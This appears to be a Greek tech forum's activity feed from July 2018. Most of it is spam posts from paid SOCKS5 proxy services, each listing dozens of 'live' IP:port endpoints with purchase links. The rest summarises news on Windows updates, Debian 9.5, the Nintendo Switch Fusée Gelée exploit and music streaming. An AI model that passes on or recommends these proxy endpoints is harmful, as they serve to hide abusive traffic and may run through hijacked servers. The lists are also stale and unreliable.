Jump to content

Όλες η Ενεργές

This stream auto-updates     

  1. Past hour
  2. tisocks

    SOCKS Proxy List - 07/17/2018 by Tisocks.net

    SOCKS Proxy List by Tisocks.net If you Need Socks5 , Please visit service and add fund via PM , BTC WMZ , WEX . Thanks all!! Add fund : https://tisocks.net/addfund Check socks5 Online here : https://checksocks5.com LIVE | 95.110.229.22:60063 | 0.42 | SOCKS5 | Toscana | 52100 | www.freestyleweb.it | Italy | Checked at https://tisocks.net LIVE | 95.110.194.245:63343 | 0.421 | SOCKS5 | Toscana | 52100 | hosting.terastudio.it | Italy | Checked at https://tisocks.net LIVE | 108.59.8.86:27782 | 0.243 | SOCKS5 | South Carolina | 29575 | mta.backbone-tech.com | United States | Checked at https://tisocks.net LIVE | 95.110.207.71:34504 | 0.415 | SOCKS5 | Toscana | 52100 | server.kimos.eu | Italy | Checked at https://tisocks.net LIVE | 31.148.219.150:1443 | 0.883 | SOCKS5 | Unknow | Unknow | aurora.enn.lu | Anonymous Proxy | Checked at https://tisocks.net LIVE | 103.250.153.220:6667 | 0.936 | SOCKS5 | Gujarat | 382355 | N/A | India | Checked at https://tisocks.net LIVE | 132.148.129.183:64699 | 0.36 | SOCKS5 | California | 92603 | ip-132-148-129-183.ip.secureserver.net | United States | Checked at https://tisocks.net LIVE | 217.160.95.120:8470 | 0.369 | SOCKS5 | Unknow | Unknow | s16157228.onlinehome-server.info | Germany | Checked at https://tisocks.net LIVE | 91.122.14.44:56792 | 0.523 | SOCKS5 | Saint Petersburg City | 190923 | ppp91-122-14-44.pppoe.avangarddsl.ru | Russian Federation | Checked at https://tisocks.net LIVE | 91.142.208.125:62216 | 0.432 | SOCKS5 | Madrid | 28001 | tangerinrestore.vservers.es | Spain | Checked at https://tisocks.net LIVE | 221.153.75.187:2542 | 0.771 | SOCKS5 | Unknow | Unknow | | Unknow | Checked at https://tisocks.net LIVE | 64.118.87.8:62645 | 0.685 | SOCKS5 | New Jersey | 07310 | drive500.123servers.com | United States | Checked at https://tisocks.net LIVE | 91.122.14.44:8411 | 0.522 | SOCKS5 | Saint Petersburg City | 190923 | ppp91-122-14-44.pppoe.avangarddsl.ru | Russian Federation | Checked at https://tisocks.net LIVE | 91.122.14.44:63874 | 0.526 | SOCKS5 | Saint Petersburg City | 190923 | ppp91-122-14-44.pppoe.avangarddsl.ru | Russian Federation | Checked at https://tisocks.net LIVE | 125.227.69.220:3261 | 0.878 | SOCKS5 | Unknow | Unknow | 111-253-81-11.dynamic-ip.hinet.net | Taiwan | Checked at https://tisocks.net
  3. shopsocks5.com

    17-07-2018 | Socks 5 & 4

    [Shopsocks5.com] Service Socks5 Cheap Payment Instantly Perfectmoney, Bitcoin, Wmtransfer, BTC-E ( Please click Buy Socks ) Check Socks Online http://shopsocks5.com/check/ Live | 159.65.136.30:2016 | United States | Dallas | TX | 75231 | Checked at Shopsocks5.com Live | 94.177.170.43:53288 | Italy | Arezzo | 16 | 52100 | Checked at Shopsocks5.com Live | 50.62.31.143:28124 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com Live | 45.63.28.79:31004 | United States | Dallas | TX | 75207 | Checked at Shopsocks5.com Live | 95.213.130.42:8181 | Russia | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 78.155.219.48:8000 | Russia | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 66.110.216.221:39603 | United States | Atlanta | GA | 30328 | Checked at Shopsocks5.com Live | 91.206.30.204:3129 | Ukraine | Kiev | 12 | Unknown | Checked at Shopsocks5.com Live | 42.112.20.116:7200 | Vietnam | Hanoi | 44 | Unknown | Checked at Shopsocks5.com Live | 132.148.129.183:64699 | United States | Minneapolis | MN | 55488 | Checked at Shopsocks5.com Live | 94.177.170.43:6673 | Italy | Arezzo | 16 | 52100 | Checked at Shopsocks5.com Live | 60.248.223.190:3256 | Taiwan | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 91.206.30.205:3129 | Ukraine | Kiev | 12 | Unknown | Checked at Shopsocks5.com Live | 178.32.227.169:30038 | France | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 217.160.95.120:8470 | Germany | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 50.63.153.173:46311 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com
  4. Today
  5. dichvusocks

    16-07-2018 | Socks 5 & 4

    Payment Instantly perfectmoney, bitcoin, wmtransfer, wex, ETH (Please click Buy Socks) Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/ LIVE | 50.63.153.173:6176 | 0.75 | Arizona | 85260 | ip-50-63-153-173.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 217.160.95.120:8470 | 0.54 | Unknow | Unknow | s16157228.onlinehome-server.info | Germany | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 50.62.35.225:42832 | 0.12 | Arizona | 85260 | ip-50-62-35-225.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 97.74.230.16:26147 | 0.09 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 97.74.230.16:25129 | 0.11 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 82.77.53.222:10080 | 0.64 | Bihor | 410001 | mail.varad.org | Romania | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 95.110.224.30:53156 | 2.12 | Toscana | 52100 | ecommerce.eniaweb.com | Italy | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 97.74.230.16:63221 | 1.37 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 97.74.230.16:55926 | 0.09 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 97.74.230.16:50112 | 0.14 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 95.110.227.5:53773 | 0.7 | Toscana | 52100 | host5-227-110-95.serverdedicati.aruba.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 150.129.54.102:6667 | 1.23 | Gujarat | 370001 | N/A | India | Blacklist: No | Checked at http://dichvusocks.us LIVE | 27.116.51.124:6667 | 1.57 | Gujarat | 383205 | N/A | India | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 46.105.57.149:7435 | 1.54 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 94.177.170.43:32949 | 0.58 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 178.32.227.169:30038 | 0.51 | Unknow | Unknow | ispconfig02.dsa.servergurus.de | France | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 192.169.140.74:50645 | 1.91 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us LIVE | 50.63.153.173:24960 | 0.09 | Arizona | 85260 | ip-50-63-153-173.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
  6. vn5socks.net

    16-07-2018 | socks 5 & 4

    LIVE ~ 159.65.136.30:2016 | 0.164 | Dallas | TX | 75231 | United States | Checked at vn5socks.net LIVE ~ 45.63.28.79:31004 | 0.146 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net LIVE ~ 140.113.66.19:9050 | 0.069 | Hsinchu | 04 | Unknown | Taiwan | Checked at vn5socks.net LIVE ~ 108.61.187.78:443 | 0.12 | Sayreville | NJ | 08872 | United States | Checked at vn5socks.net LIVE ~ 50.62.35.225:42832 | 0.199 | Scottsdale | AZ | 85260 | United States | Checked at vn5socks.net LIVE ~ 50.63.153.173:6176 | 0.207 | Scottsdale | AZ | 85260 | United States | Checked at vn5socks.net LIVE ~ 12.90.33.234:47703 | 0.188 | San Jose | CA | Unknown | United States | Checked at vn5socks.net LIVE ~ 107.151.139.187:2016 | 0.182 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net LIVE ~ 73.208.67.207:47213 | 0.243 | Mount Laurel | NJ | 08054 | United States | Checked at vn5socks.net LIVE ~ 162.223.88.232:2020 | 0.239 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net LIVE ~ 75.151.213.85:3366 | 0.255 | Jackson | MS | Unknown | United States | Checked at vn5socks.net LIVE ~ 54.38.137.147:9951 | 0.261 | Woodbridge | NJ | 07095 | United States | Checked at vn5socks.net LIVE ~ 216.54.3.252:27723 | 0.243 | Unknown | Unknown | Unknown | United States | Checked at vn5socks.net LIVE ~ 18.206.37.93:47443 | 0.304 | Cambridge | MA | 02139 | United States | Checked at vn5socks.net LIVE ~ 95.132.129.98:55580 | 0.258 | Kiev | 12 | Unknown | Ukraine | Checked at vn5socks.net LIVE ~ 195.3.156.46:55580 | 0.286 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net LIVE ~ 91.219.31.254:2018 | 0.295 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net LIVE ~ 78.26.207.173:30013 | 0.272 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
  7. tisocks

    SOCKS Proxy List - 07/16/2018 by Tisocks.net

    SOCKS Proxy List by Tisocks.net If you Need Socks5 , Please visit service and add fund via PM , BTC WMZ , WEX . Thanks all!! Add fund : https://tisocks.net/addfund Check socks5 Online here : https://checksocks5.com LIVE | 97.74.230.16:16246 | 0.261 | SOCKS5 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Checked at https://tisocks.net LIVE | 95.110.229.22:60063 | 0.425 | SOCKS5 | Toscana | 52100 | www.freestyleweb.it | Italy | Checked at https://tisocks.net LIVE | 95.110.194.245:63343 | 0.428 | SOCKS5 | Toscana | 52100 | hosting.terastudio.it | Italy | Checked at https://tisocks.net LIVE | 95.110.207.71:34504 | 0.417 | SOCKS5 | Toscana | 52100 | server.kimos.eu | Italy | Checked at https://tisocks.net LIVE | 108.59.8.86:54974 | 0.409 | SOCKS5 | New York | 10456 | ool-18b89e23.dyn.optonline.net | United States | Checked at https://tisocks.net LIVE | 24.148.104.221:15616 | 0.101 | SOCKS5 | New York | 12534 | 24-148-104-221.ip.mhcable.com | United States | Checked at https://tisocks.net LIVE | 108.59.8.86:35453 | 0.345 | SOCKS5 | Delaware | 19904 | 133.sub-174-200-0.myvzw.com | United States | Checked at https://tisocks.net LIVE | 207.246.96.8:8866 | 0.268 | SOCKS5 | California | 90012 | 207.246.96.8.vultr.com | United States | Checked at https://tisocks.net LIVE | 39.1.37.20:8081 | 0.874 | SOCKS5 | Unknow | Unknow | N/A | Taiwan | Checked at https://tisocks.net LIVE | 132.148.129.183:64699 | 0.266 | SOCKS5 | California | 92603 | ip-132-148-129-183.ip.secureserver.net | United States | Checked at https://tisocks.net LIVE | 150.129.171.115:6667 | 1.006 | SOCKS5 | Gujarat | 364710 | N/A | India | Checked at https://tisocks.net LIVE | 60.248.223.190:3233 | 0.822 | SOCKS5 | Unknow | Unknow | 111-253-77-240.dynamic-ip.hinet.net | Taiwan | Checked at https://tisocks.net LIVE | 80.211.29.123:7759 | 0.432 | SOCKS5 | Toscana | 52100 | host123-29-211-80.serverdedicati.aruba.it | Italy | Checked at https://tisocks.net LIVE | 185.183.97.123:9050 | 0.647 | SOCKS5 | Unknow | Unknow | 241.ip-137-74-169.eu | Anonymous Proxy | Checked at https://tisocks.net LIVE | 217.160.95.120:8470 | 0.362 | SOCKS5 | Unknow | Unknow | s16157228.onlinehome-server.info | Germany | Checked at https://tisocks.net
  8. shopsocks5.com

    16-07-2018 | Socks 5 & 4

    [Shopsocks5.com] Service Socks5 Cheap Payment Instantly Perfectmoney, Bitcoin, Wmtransfer, BTC-E ( Please click Buy Socks ) Check Socks Online http://shopsocks5.com/check/ Live | 60.248.223.190:3041 | Taiwan | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 204.0.52.231:63719 | United States | Englewood | CO | 80111 | Checked at Shopsocks5.com Live | 159.65.136.30:2016 | United States | Dallas | TX | 75231 | Checked at Shopsocks5.com Live | 80.211.29.123:7759 | Denmark | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 45.33.68.13:26924 | United States | Newark | NJ | 07102 | Checked at Shopsocks5.com Live | 207.154.248.155:2016 | United States | West Hollywood | CA | 90069 | Checked at Shopsocks5.com Live | 204.42.255.250:13264 | United States | Englewood | CO | 80111 | Checked at Shopsocks5.com Live | 60.248.223.190:3283 | Taiwan | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 91.206.30.204:3129 | Ukraine | Kiev | 12 | Unknown | Checked at Shopsocks5.com Live | 72.210.252.134:46164 | United States | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 60.248.223.190:1081 | Taiwan | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 132.148.129.183:55116 | United States | Minneapolis | MN | 55488 | Checked at Shopsocks5.com Live | 95.213.130.42:8181 | Russia | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 60.248.223.190:3031 | Taiwan | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 98.172.253.157:40753 | United States | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 45.63.28.79:31004 | United States | Dallas | TX | 75207 | Checked at Shopsocks5.com
  9. Την Τετάρτη που μας πέρασε ο Mike Benson της Microsoft αποκάλυψε ότι η εταιρεία θα σταματήσει την διάθεση των delta updates από τον Φεβρουάριο του 2019 και θα διαθέτει αποκλειστικά τα Express Updates. Η Microsoft κυκλοφορεί τις αθροιστικές ενημερώσεις στα Windows 10 για να “μειώσει τον κατακερματισμό των οικοσυστημάτων” και για να “διευκολύνει τους διαχειριστές συστημάτων αλλά και τους τελικούς χρήστες να είναι ενημερωμένοι και ασφαλείς”. Οι αθροιστικές ενημερώσεις όμως έφεραν πάρα πολλά προβλήματα. Το μεγαλύτερο από αυτά είναι ότι από διαχειριστές μέχρι τελικούς χρήστες, κανείς δεν γνωρίζει αν εγκατασταθεί η ενημερωμένη έκδοση ή όχι. Και αν εγκατασταθεί θα παρουσιάσει άλλα προβλήματα στον υπολογιστή; Η Microsoft όμως αναφέρει άλλο ένα σημαντικό ζήτημα: το συνεχώς αυξανόμενο μέγεθος των ενημερώσεων. Ο Benson αναφέρει ότι οι αθροιστικές ενημερώσεις ξεκίνησαν από 100 έως 200 Megabytes αλλά σήμερα το μέγεθός τους φτάνει μέχρι το 1-1,2 Gigabytes. Έτσι η εταιρεία το 2017 ανακοίνωσε ότι μείωσε το μέγεθος των Ενημερώσεων των Windows χρησιμοποιώντας διαφορετικά πακέτα. Η Microsoft σχεδίασε και αναπτύσσει τρεις διαφορετικούς τύπους ενημερώσεων: Οι πλήρεις ενημερώσεις (Full updates) που συμπεριλαμβάνουν όλα τα στοιχεία και τα αρχεία που έχουν αλλαχθεί ή έχουν προστεθεί από την τελευταία μεγάλη ενημέρωση. Η Microsoft αποκαλεί αυτές τις ενημερώσεις LCU, από το Latest Cumulative Update (τελευταία αθροιστική ενημέρωση). Οι ενημερώσεις Delta συμπεριλαμβάνουν μόνο τα στοιχεία και τα αρχεία που άλλαξαν από την τελευταία ενημερωμένη έκδοση. Οι ενημερώσεις Delta μπορούν να εγκατασταθούν μόνο αν το σύστημα ενημερώνεται σε τακτική βάση. Οι ενημερώσεις Express διαθέτουν στο σύστημα μόνο ό, τι χρειάζεται Τα Delta updates είναι μεγαλύτερα σε μέγεθος από τα express updates και τα Full updates είναι μεγαλύτερα από τις ενημερώσεις Delta. Οι ενημερώσεις Express έχουν άλλο ένα πλεονέκτημα έναντι των ενημερώσεων Delta: δεν απαιτούν την εγκατάσταση των ενημερώσεων του προηγούμενου μήνα. Τα delta updates κυκλοφόρησαν από τη Microsoft κυρίως επειδή το πρωτόκολλο των express updates ήταν διαθέσιμο μόνο σε συσκευές που διέθεταν το Windows Update ή το Windows Server Update Services και όχι σε συστήματα διαχείρισης ενημερώσεων από τρίτους κατασκευαστές. Η Microsoft επέκτεινε το πρωτόκολλο των express updates τον Ιανουάριο του 2017, αλλά δεν απενεργοποίησε τις ενημερώσεις Delta για να “δοθεί χρόνος στις εταιρείες να αναβαθμίσουν τα εργαλεία διαχείρισης ενημερώσεων για την υποστήριξη των express updates”. Έτσι οι πρόσφατες εκδόσεις των Windows 10 (Windows 10 build 1607 έως και 1803) θα υποστηρίζουν τις ενημερώσεις Delta. To Windows 10 build 1809, (October 2018 Update) θα υποστηρίζει επίσης τις ενημερώσεις Delta αλλά θα είναι η τελευταία έκδοση που θα τις υποστηρίζει. Η Microsoft ανακοίνωσε ότι θα τερματίσει την υποστήριξη των συγκεκριμένων ενημερώσεων (delta updates) στις 12 Φεβρουαρίου του 2019. Read more...
  10. Η ομάδα ανάπτυξης του Debian διέθεσε το πέμπτο point release του Debian 9 την 14η Ιουλίου. Στο νέο Debian 9.5, συμπεριλαμβάνονται όλα τα τελευταία patches. Έτσι αν έχετε ήδη εγκαταστήσει το Debian 9 τότε δεν χρειάζεται να κατεβάσετε κάποιο από τα νέα ISO, απλά ενημερώστε το σύστημά σας. Στην ανακοίνωσή τους, το Debian project αναφέρει: “Το Debian project ανακοινώνει με μεγάλη χαρά την τέταρτη ενημέρωση της σταθερής διανομής Debian 9 (κωδική ονομασία stretch). Το point release προσθέτει κυρίως διορθώσεις για θέματα ασφαλείας, μαζί με μερικές προσαρμογές για σοβαρά προβλήματα. Τα patches ασφαλείας έχουν ήδη δημοσιευθεί ξεχωριστά.” Μπορείτε να διαβάσετε την ανακοίνωση της νέας έκδοσης Debian 9.5, η οποία περιέχει και όλα τα bugfixes της πέμπτης ενημέρωσης. Όσοι από εσάς θέλετε να δείτε το τελευταίο λειτουργικό σύστημα χωρίς να το εγκαταστήσετε, μπορείτε να κατεβάσετε μια από τις παρακάτω εικόνες με τον torrent client που προτιμάτε: MD5SUMS 2018-07-14 21:17 1.7K MD5SUMS.sign 2018-07-15 12:59 833 SHA1SUMS 2018-07-14 21:17 1.9K SHA1SUMS.sign 2018-07-15 12:59 833 SHA256SUMS 2018-07-14 21:17 2.5K SHA256SUMS.sign 2018-07-15 12:59 833 SHA512SUMS 2018-07-14 21:17 4.0K SHA512SUMS.sign 2018-07-15 12:59 833 debian-live-9.5.0-amd64-cinnamon.iso.torrent 2018-07-14 21:15 80K debian-live-9.5.0-amd64-gnome.iso.torrent 2018-07-14 21:16 45K debian-live-9.5.0-amd64-kde.iso.torrent 2018-07-14 21:16 49K debian-live-9.5.0-amd64-lxde.iso.torrent 2018-07-14 21:16 75K debian-live-9.5.0-amd64-mate.iso.torrent 2018-07-14 21:16 77K debian-live-9.5.0-amd64-xfce.iso.torrent 2018-07-14 21:16 73K Read more...
  11. Windows 7 και CPU: Τον Αύγουστο του 2000, πριν από σχεδόν 18 χρόνια, η Intel παρουσίασε τον τελευταίο της επεξεργαστή Pentium 4. Ο Pentium 4 έφερε πολλά πλεονεκτήματα σε σχέση με το Pentium III. Ο επεξεργαστής διέθετε ένα νέο σύνολο οδηγιών χρήσης των multimedia, (ονομάστηκαν SSE2), που επιτρέπουν στο τσιπ να επεξεργάζεται τα πολυμέσα παράλληλα, επιταχύνοντας έτσι την απόδοση. Το πιστεύετε ή όχι, μερικοί εξακολουθούν να τρέχουν Windows 7 σε υπολογιστές που διαθέτουν επεξεργαστές Pentium III. Ωστόσο, οι ενημερώσεις ασφαλείας των Windows 7 δεν συμφωνούν. Η προσθήκη υποστήριξης για το Streaming SIMD Extensions 2 (SSE2) ήταν μεγάλη υπόθεση την εποχή εκείνη. Ήταν ένα high-end χαρακτηριστικό που κυκλοφόρησε το 2000. Μέχρι το 2004 κάθε mainstream επεξεργαστής υποστήριζε το συγκεκριμένο χαρακτηριστικό. Τα σύγχρονα PC χρησιμοποιούν ακόμα την τεχνολογία αλλά σε μια πιο εξελιγμένη μορφή αφού η τελευταία έκδοση είναι η SSE 4.2. Η υποστήριξη SSE2 έγινε απαραίτητη προϋπόθεση το 2012, όταν η Microsoft ανακοίνωσε ότι ήταν ένα από τα τρία υποχρεωτικά χαρακτηριστικά της CPU που απαιτούνται για το νέο της λειτουργικό σύστημα. Τα Windows 10 έχουν τις ίδιες απαιτήσεις. Αυτό έγινε όμως πριν από έξι χρόνια, που είναι μια αιωνιότητα στον τομέα των υπολογισμών. Η έκπληξη (?) ήρθε τον Μάρτιο που μας πέρασε και αφορούσε τα Windows 7. Το ζήτημα ξεκίνησε με την μηνιαία ενημέρωση ασφαλείας τον Μάρτιο του 2018 για τα Windows 7. Η ενημερωμένη έκδοση KB4088875, συμπεριλαμβάνει την παρακάτω προειδοποίηση στα “Γνωστά ζητήματα”: Παρουσιάζεται σφάλμα διακοπής σε υπολογιστές που δεν υποστηρίζουν το Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2) ή A Stop error occurs on computers that don’t support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2). Στην προτελευταία ενημέρωση (Ιούνιος του 2018), το κείμενο αναφέρει: “Αναβάθμιση των συστημάτων σας με επεξεργαστή που υποστηρίζει SSE2 ή virtualization αυτών των μηχανών.” ή “Upgrade your machines with a processor that supports SSE2 or virtualize those machines.” Πρόκειται για παραβίαση της δέσμευσης υποστήριξης της Microsoft προς τους πελάτες της που χρησιμοποιούν τα Windows 7; Οι όροι της Πολιτικής των Επιχειρήσεων, Προγραμματιστών και Επιτραπέζιων Λειτουργιών της Microsoft, αναφέρουν για αυτή τη κατάσταση: Η Microsoft δεσμεύεται να παρέχει προϊόντα με βελτιωμένη ασφάλεια. Αν και προσπαθούμε να εξαλείψουμε τα τρωτά σημεία κατά τη διάρκεια της ανάπτυξης, αυτά παραμένουν και έτσι πρέπει να είμαστε έτοιμοι να ανταποκριθούμε όταν ανακαλυφθούν. Η Microsoft συμβουλεύει τους πελάτες να εγκαθιστούν τις πιο πρόσφατες εκδόσεις λογισμικού, τις ενημερώσεις ασφαλείας και τα service packs ώστε να παραμένουν όσο το δυνατόν πιο ασφαλείς. […] Τα παλαιότερα προϊόντα ενδέχεται να μην πληρούν τις σημερινές απαιτήσεις ασφαλείας. Η Microsoft ενδέχεται να μην είναι σε θέση να παρέχει ενημερωμένες εκδόσεις ασφαλείας για τα παλαιότερα προϊόντα. Αυτό ακριβώς φαίνεται να συνέβη εδώ. Με την ενημέρωση του Μάρτη, οι αθροιστικές ενημερώσεις των Windows 7 δεν μπορούσαν να εγκατασταθούν σε κάποιο σύστημα που χρησιμοποιεί Pentium III. Η Microsoft δεν αποκάλυψε τον λόγο για αυτή την ασυμβατότητα, αλλά δεν χρειάζεται να φανταστεί κανείς ότι το πρόβλημα σχετίζεται πιθανότατα με τις ευπάθειες Spectre και Meltdown, οι οποίες επηρεάζουν όλους τους επεξεργαστές της Intel. Όπως φαίνεται οι τεράστιες αλλαγές που απαιτούνται από τα patches του kernel για τις ευπάθειες Meltdown/Specter ήταν υπερβολικές για την οικογένεια Pentium III. Έτσι τα συγκεκριμένα συστήματα σταμάτησαν να υποστηρίζονται από τα Windows 7. Έχει ευθύνη η Microsoft για την υποστήριξη αρχαίων επεξεργαστών; Ή μήπως η ευθύνη είναι δική σας, όταν χρησιμοποιείτε 18 χρόνια ένα PC; Πέρυσι, η Microsoft σταμάτησε την υποστήριξη για ενημερώσεις σε νέα έκδοση των Windows 10, σε έναν πολύ μικρό αριθμό υπολογιστών Windows 10 αλλά συμφώνησε να συνεχίσει να παρέχει ενημερώσεις ασφαλείας μέχρι το 2023. Η εταιρεία έδωσε παράταση στην παροχή ενημερώσεων ασφαλείας γιατί όλα τα περιστατικά αφορούσαν hardware που ήταν σχεδόν καινούργιο. Το να ζητάτε υποστήριξη για hardware που είναι 18 χρονών δεν είναι το ίδιο. Έτσι αν είστε ένας από τους πολύ λίγους που εξακολουθούν να χρησιμοποιούν Pentium III, καλό θα είναι να θυμάστε τα λόγια του σπουδαίου George Burns: Σηκώνομαι κάθε πρωί και διαβάζω τη στήλη της νεκρολογίας. Αν το όνομά μου δεν είναι εκεί, τρώω πρωινό. Για όσους προσπαθούν να επεκτείνουν τη ζωή ενός υπολογιστή της δεκαετίας του 1990, διαβάστε την παραπάνω νεκρολογία, αφήστε το πρωινό και πηγαίνετε για ψώνια. Read more...
  12. Εάν σχεδιάζεις να αγοράσεις μια κονσόλα παιχνιδιών Nintendo Switch για να τρέξεις το Linux σε αυτήν χρησιμοποιώντας το “unpatchable” exploit που αποκαλύφθηκε δημοσίως πριν από λίγους μήνες, ξανασκέψου το γιατί η Nintendo επιδιόρθωσε το κενό ασφαλείας. Πληροφοριακά, πριν από λίγο καιρό, η ομάδα hackers, ReSwitched, αποκάλυψε δημοσίως μια ευπάθεια ασφαλείας στο Nvidia Tegra X1 chip που ονόμασαν Fusée Gelée και θα μπορούσε να επιτρέψει σε οποιονδήποτε να χακάρει μια κονσόλα παιχνιδιών Nintendo Switch για να εγκαταστήσει ένα λειτουργικό σύστημα που βασίζεται στο Linux και να τρέξει homebrew κώδικα και εφαρμογές χρησιμοποιώντας ένα απλό τέχνασμα. Η Nintendo από πλευράς της εργάστηκε σκληρά για να διορθώσει την ευπάθεια, την οποία οι hackers ονόμασαν “unpatchable”. Η εταιρεία κυκλοφορεί αναθεωρημένες μονάδες Nintendo Switch οι οποίες δεν είναι πλέον ευάλωτες ως προς το Fusée Gelée και παρόμοια hacks. Τα καλά νέα είναι ότι αν διαθέτεις ήδη μια κονσόλα Nintendο Switch, είναι πιθανό να μπορείς να τη χακάρεις με διάφορες διαθέσιμες μεθόδους της αγορά, ώστε να μπορείς να τρέξεις το Linux και άλλα λογισμικά homebrew σε αυτό. Κατά τον ίδιο τρόπο, μερικές αναθεωρημένες μονάδες Nintendo Switch εξακολουθούν να διαθέτουν ένα παλαιότερο firmware που είναι ευάλωτο σε αυτά τα hacks. Ο hacker SciresM αναφέρει στο Twitter ότι οι νέες μονάδες Nintendo Switch χρησιμοποιούν firmware 4.1.0, που είναι ευάλωτα στο deja vu exploit. Ο hacker παροτρύνει τους χρήστες που αγόρασαν ένα νέο Nintendο Switch το οποίο τρέχει firmware 4.1.0 να μην αναβαθμίσουν στο firmware 5.0.0 που έστειλε πρόσφατα η Nintendo. Read more...
  13. Ραγδαία χρήση έχει σημειωθεί το 2018 σε streaming υπηρεσίες μουσικής και video. Το 2016 το 50% της συνολικής αναπαραγωγής μουσικής που έγινε ήταν μέσω streaming από υπηρεσίες όπως είναι το Spotify ή το Tidal, ενώ φέτος το ποσοστό έχει ανεβεί στο 75%, σύμφωνα με την Nielsen. Οι Αμερικανοί πέτυχαν μέσω streaming υπηρεσιών την αναπαραγωγή 403 δισεκατομμυρίων μουσικών κομματιών το πρώτο εξάμηνο του 2018, έναν αριθμό χωρίς προηγούμενο. Οι δυο πιο δημοφιλείς καλλιτέχνες, οι οποίοι είχαν τις περισσότερες online αναπαραγωγές των κομματιών τους στις ΗΠΑ, είναι ο Drake και ο Post Malone, σημειώνοντας 3.3 και 3.1 δισεκατομμύρια ακροάσεις αντίστοιχα. Το πιο δημοφιλές τραγούδι για το 2018 μέχρι στιγμής είναι το God’s Plan του Drake. Όσο οι υπηρεσίες streaming μουσικής αναπτύσσονται και το κοινό τους μεγαλώνει, τόσο συνεχίζει να μειώνεται η απήχηση των υπόλοιπων μέσων. Οι πωλήσεις των δίσκων, είτε φυσικών είτε ψηφιακών, μειώνεται σταθερά εδώ και αρκετά χρονιά, μαζί τους και οι πωλήσεις από single κομμάτια, καθώς οι χρήστες στρέφονται προς τις streaming υπηρεσίες. Φυσικά όμως αυτές οι υπηρεσίες δεν είναι εντελώς δωρεάν. Παρόλο που κάποιες από αυτές παρέχουν πρόσβαση στο περιεχόμενο τους δωρεάν, εμφανίζουν αρκετές διαφημίσεις, ενώ άλλες παρέχουν συνδρομητικά πακέτα με χρέωση ανά μήνα. Συνολικά, οι χρήστες που πληρώνουν κάποια μουσική συνδρομητική υπηρεσία, προσφέρουν στην μουσική βιομηχανία σχεδόν 4.1 δισεκατομμύρια δολάρια. Αντίστοιχα, ενώ οι δωρεάν χρήστες βομβαρδίζονται με πολύ συχνές διαφημίσεις, τα έσοδα που προσφέρουν στην βιομηχανία είναι πολύ λιγότερα, καθώς το 2017 υπηρεσίες όπως το Spotify και το Youtube έβγαλαν περίπου 660 εκατομμύρια δολάρια. Ο αριθμός αν και μεγάλος, φαίνεται μηδαμινός μπροστά στα 4 δισεκατομμύρια που πληρώνουν στο σύνολο οι συνδρομητές των streaming υπηρεσιών. Read more...
  14. Anastasis

    Hackers πουλάνε πρόσβαση σε backdoored server μέσω RDP

